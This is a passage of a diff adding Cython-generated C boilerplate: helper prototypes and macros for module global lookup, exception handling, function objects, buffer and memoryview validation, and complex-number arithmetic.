LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* AssertionsEnabled.proto */ +#define __Pyx_init_assertions_enabled() +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX < 0x02070600 && !defined(Py_OptimizeFlag) + #define __pyx_assertions_enabled() (1) +#elif PY_VERSION_HEX < 0x03080000 || CYTHON_COMPILING_IN_PYPY || defined(Py_LIMITED_API) + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#elif CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030900A6 + static int __pyx_assertions_enabled_flag; + #define __pyx_assertions_enabled() (__pyx_assertions_enabled_flag) + #undef __Pyx_init_assertions_enabled + static void __Pyx_init_assertions_enabled(void) { + __pyx_assertions_enabled_flag = ! _PyInterpreterState_GetConfig(__Pyx_PyThreadState_Current->interp)->optimization_level; + } +#else + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#endif + +/* RaiseTooManyValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); + +/* RaiseNeedMoreValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); + +/* RaiseNoneIterError.proto */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void); + +/* ExtTypeTest.proto */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type); + +/* GetTopmostException.proto */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); +#endif + +/* SaveResetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +#else +#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) +#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) +#endif + +/* GetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* SwapException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* ssize_strlen.proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +/* ListCompAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len)) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) +#endif + +/* PySequenceMultiply.proto */ +#define __Pyx_PySequence_Multiply_Left(mul, seq) __Pyx_PySequence_Multiply(seq, mul) +static CYTHON_INLINE PyObject* __Pyx_PySequence_Multiply(PyObject *seq, Py_ssize_t mul); + +/* SetItemInt.proto */ +#define __Pyx_SetItemInt(o, i, v, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_SetItemInt_Fast(o, (Py_ssize_t)i, v, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list assignment index out of range"), -1) :\ + __Pyx_SetItemInt_Generic(o, to_py_func(i), v))) +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v); +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, + int is_list, int wraparound, int boundscheck); + +/* RaiseUnboundLocalError.proto */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); + +/* DivInt[long].proto */ +static CYTHON_INLINE long __Pyx_div_long(long, long); + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* HasAttr.proto */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *, PyObject *); + +/* IsLittleEndian.proto */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void); + +/* BufferFormatCheck.proto */ +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts); +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type); + +/* BufferGetAndValidate.proto */ +#define __Pyx_GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)\ + ((obj == Py_None || obj == NULL) ?\ + (__Pyx_ZeroBuffer(buf), 0) :\ + __Pyx__GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)) +static int __Pyx__GetBufferAndValidate(Py_buffer* buf, PyObject* obj, + __Pyx_TypeInfo* dtype, int flags, int nd, int cast, __Pyx_BufFmt_StackElem* stack); +static void __Pyx_ZeroBuffer(Py_buffer* buf); +static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info); +static Py_ssize_t __Pyx_minusones[] = { -1, -1, -1, -1, -1, -1, -1, -1 }; +static Py_ssize_t __Pyx_zeros[] = { 0, 0, 0, 0, 0, 0, 0, 0 }; + +/* UnicodeConcatInPlace.proto */ +# if CYTHON_COMPILING_IN_CPYTHON && PY_MAJOR_VERSION >= 3 + #if CYTHON_REFNANNY + #define __Pyx_PyUnicode_ConcatInPlace(left, right) __Pyx_PyUnicode_ConcatInPlaceImpl(&left, right, __pyx_refnanny) + #else + #define __Pyx_PyUnicode_ConcatInPlace(left, right) __Pyx_PyUnicode_ConcatInPlaceImpl(&left, right) + #endif + static CYTHON_INLINE PyObject *__Pyx_PyUnicode_ConcatInPlaceImpl(PyObject **p_left, PyObject *right + #if CYTHON_REFNANNY + , void* __pyx_refnanny + #endif + ); +#else +#define __Pyx_PyUnicode_ConcatInPlace __Pyx_PyUnicode_Concat +#endif +#define __Pyx_PyUnicode_ConcatInPlaceSafe(left, right) ((unlikely((left) == Py_None) || unlikely((right) == Py_None)) ?\ + PyNumber_InPlaceAdd(left, right) : __Pyx_PyUnicode_ConcatInPlace(left, right)) + +/* SliceObject.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetSlice( + PyObject* obj, Py_ssize_t cstart, Py_ssize_t cstop, + PyObject** py_start, PyObject** py_stop, PyObject** py_slice, + int has_cstart, int has_cstop, int wraparound); + +/* PyObject_Str.proto */ +#define __Pyx_PyObject_Str(obj)\ + (likely(PyString_CheckExact(obj)) ? __Pyx_NewRef(obj) : PyObject_Str(obj)) + +/* PyObjectLookupSpecial.proto */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_LookupSpecialNoError(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 0) +#define __Pyx_PyObject_LookupSpecial(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 1) +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error); +#else +#define __Pyx_PyObject_LookupSpecialNoError(o,n) __Pyx_PyObject_GetAttrStrNoError(o,n) +#define __Pyx_PyObject_LookupSpecial(o,n) __Pyx_PyObject_GetAttrStr(o,n) +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* IterFinish.proto */ +static CYTHON_INLINE int __Pyx_IterFinish(void); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* UnpackItemEndCheck.proto */ +static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected); + +/* UnpackTupleError.proto */ +static void __Pyx_UnpackTupleError(PyObject *, Py_ssize_t index); + +/* UnpackTuple2.proto */ +#define __Pyx_unpack_tuple2(tuple, value1, value2, is_tuple, has_known_size, decref_tuple)\ + (likely(is_tuple || PyTuple_Check(tuple)) ?\ + (likely(has_known_size || PyTuple_GET_SIZE(tuple) == 2) ?\ + __Pyx_unpack_tuple2_exact(tuple, value1, value2, decref_tuple) :\ + (__Pyx_UnpackTupleError(tuple, 2), -1)) :\ + __Pyx_unpack_tuple2_generic(tuple, value1, value2, has_known_size, decref_tuple)) +static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** value1, PyObject** value2, int decref_tuple); +static int __Pyx_unpack_tuple2_generic( + PyObject* tuple, PyObject** value1, PyObject** value2, int has_known_size, int decref_tuple); + +/* dict_iter.proto */ +static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* dict, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_is_dict); +static CYTHON_INLINE int __Pyx_dict_iter_next(PyObject* dict_or_iter, Py_ssize_t orig_length, Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int is_dict); + +/* PyIntBinop.proto */ +#if !CYTHON_COMPILING_IN_PYPY +static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); +#else +#define __Pyx_PyInt_AddObjC(op1, op2, intval, inplace, zerodivision_check)\ + (inplace ? PyNumber_InPlaceAdd(op1, op2) : PyNumber_Add(op1, op2)) +#endif + +/* BufferIndexError.proto */ +static void __Pyx_RaiseBufferIndexError(int axis); + +#define __Pyx_BufPtrStrided1d(type, buf, i0, s0) (type)((char*)buf + i0 * s0) +/* PyUnicode_Unicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* SetVTable.proto */ +static int __Pyx_SetVtable(PyTypeObject* typeptr , void* vtable); + +/* GetVTable.proto */ +static void* __Pyx_GetVtable(PyTypeObject *type); + +/* MergeVTables.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type); +#endif + +/* TypeImport.proto */ +#ifndef __PYX_HAVE_RT_ImportType_proto_3_0_0 +#define __PYX_HAVE_RT_ImportType_proto_3_0_0 +#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L +#include +#endif +#if (defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) || __cplusplus >= 201103L +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) alignof(s) +#else +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) sizeof(void*) +#endif +enum __Pyx_ImportType_CheckSize_3_0_0 { + __Pyx_ImportType_CheckSize_Error_3_0_0 = 0, + __Pyx_ImportType_CheckSize_Warn_3_0_0 = 1, + __Pyx_ImportType_CheckSize_Ignore_3_0_0 = 2 +}; +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject* module, const char *module_name, const char *class_name, size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size); +#endif + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +#if PY_MAJOR_VERSION < 3 + static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags); + static void __Pyx_ReleaseBuffer(Py_buffer *view); +#else + #define __Pyx_GetBuffer PyObject_GetBuffer + #define __Pyx_ReleaseBuffer PyBuffer_Release +#endif + + +/* BufferStructDeclare.proto */ +typedef struct { + Py_ssize_t shape, strides, suboffsets; +} __Pyx_Buf_DimInfo; +typedef struct { + size_t refcount; + Py_buffer pybuffer; +} __Pyx_Buffer; +typedef struct { + __Pyx_Buffer *rcbuffer; + char *data; + __Pyx_Buf_DimInfo diminfo[8]; +} __Pyx_LocalBuf_ND; + +/* MemviewSliceIsContig.proto */ +static int __pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim); + +/* OverlappingSlices.proto */ +static int __pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize); + +/* TypeInfoCompare.proto */ +static int __pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b); + +/* MemviewSliceValidateAndInit.proto */ +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dcd__double(PyObject *, int writable_flag); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dc_unsigned_char(PyObject *, int writable_flag); + +/* RealImag.proto */ +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #define __Pyx_CREAL(z) ((z).real()) + #define __Pyx_CIMAG(z) ((z).imag()) + #else + #define __Pyx_CREAL(z) (__real__(z)) + #define __Pyx_CIMAG(z) (__imag__(z)) + #endif +#else + #define __Pyx_CREAL(z) ((z).real) + #define __Pyx_CIMAG(z) ((z).imag) +#endif +#if defined(__cplusplus) && CYTHON_CCOMPLEX\ + && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) + #define __Pyx_SET_CREAL(z,x) ((z).real(x)) + #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) +#else + #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) + #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_float(a, b) ((a)==(b)) + #define __Pyx_c_sum_float(a, b) ((a)+(b)) + #define __Pyx_c_diff_float(a, b) ((a)-(b)) + #define __Pyx_c_prod_float(a, b) ((a)*(b)) + #define __Pyx_c_quot_float(a, b) ((a)/(b)) + #define __Pyx_c_neg_float(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_float(z) ((z)==(float)0) + #define __Pyx_c_conj_float(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_float(z) (::std::abs(z)) + #define __Pyx_c_pow_float(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_float(z) ((z)==0) + #define __Pyx_c_conj_float(z) (conjf(z)) + #if 1 + #define __Pyx_c_abs_float(z) (cabsf(z)) + #define __Pyx_c_pow_float(a, b) (cpowf(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex); + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex, __pyx_t_float_complex); + #endif +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_double(a, b) ((a)==(b)) + #define __Pyx_c_sum_double(a, b) ((a)+(b)) + #define __Pyx_c_diff_double(a, b) ((a)-(b)) + #define __Pyx_c_prod_double(a, b) ((a)*(b)) + #define __Pyx_c_quot_double(a, b) ((a)/(b)) + #define __Pyx_c_neg_double(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_double(z) ((z)==(double)0) + #define __Pyx_c_conj_double(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (::std::abs(z)) + #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_double(z) ((z)==0) + #define __Pyx_c_conj_double(z) (conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (cabs(z)) + #define __Pyx_c_pow_double(a, b) (cpow(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex 